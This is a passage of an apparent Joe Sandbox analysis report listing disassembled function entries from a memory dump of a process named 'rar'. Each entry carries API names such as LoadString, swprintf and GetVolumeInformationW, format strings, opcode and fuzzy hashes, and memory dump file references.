                                                        • String ID: $%s$@%s
                                                        • API String ID: 4288800496-834177443
                                                        • Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                        • Instruction ID: 8dbcaf9730402e0194a597e77ba1a77f4bed1688e9132b50b3ad2c2db801e633
                                                        • Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                        • Instruction Fuzzy Hash: DF31902EB08A4296EB10AB55E440BADA364FB54788FC00037DE2E17BD5DE3DD516C7A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: LoadString
                                                        • String ID: Adding %-58s
                                                        • API String ID: 2948472770-2059140559
                                                        • Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                        • Instruction ID: a7730defd3bfecc61b06e5f9da8116b6b62fde35b805e44d6821948f0cdcb669
                                                        • Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                        • Instruction Fuzzy Hash: A5116069B14B8185E710AF16E840568F7A1FB94FE0F948436CE2D837A4EE7CE6078394
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: swprintf
                                                        • String ID: ;%%0%du
                                                        • API String ID: 233258989-2249936285
                                                        • Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                        • Instruction ID: 4eafdc222a4a610ab098927a299e1b4a57f79d792e02d3326e2468e3f41ada68
                                                        • Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                        • Instruction Fuzzy Hash: 1411982AB0868086E720AB24E4117E9B761FB88748FC94132DF5E477D6DE3CD946CB90
                                                        APIs
                                                          • Part of subcall function 00007FF7F7EB42CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EB430F
                                                        • GetVolumeInformationW.KERNEL32(?,00007FF7F7EA0BED,?,?,00000000,?,?,00007FF7F7E9F30F,00000000,00007FF7F7E86380,?,00007FF7F7E82EC8), ref: 00007FF7F7EA337E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: InformationVolumeswprintf
                                                        • String ID: FAT$FAT32
                                                        • API String ID: 989755765-1174603449
                                                        • Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                        • Instruction ID: 84ed01e50e4043a0975dff0248d130769ea3b0917fb1ec7006f8343af6423532
                                                        • Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                        • Instruction Fuzzy Hash: D8118635A1CA4241F760AF10E8816E6B354FB95344FC05036E56E83AD5DF3CD54A8B50
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ErrorExceptionLastObjectSingleThrowWait
                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                        • API String ID: 564652978-2248577382
                                                        • Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                        • Instruction ID: 4f0f4ce070a8d805150324086c14ec86e7f1d0c7f9e2df3c5d7a4ff0394eb467
                                                        • Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                        • Instruction Fuzzy Hash: A1E01A2EE0880282E700B735AC814B4B361AF60774FD04732D03F429E2DF6CA54783A1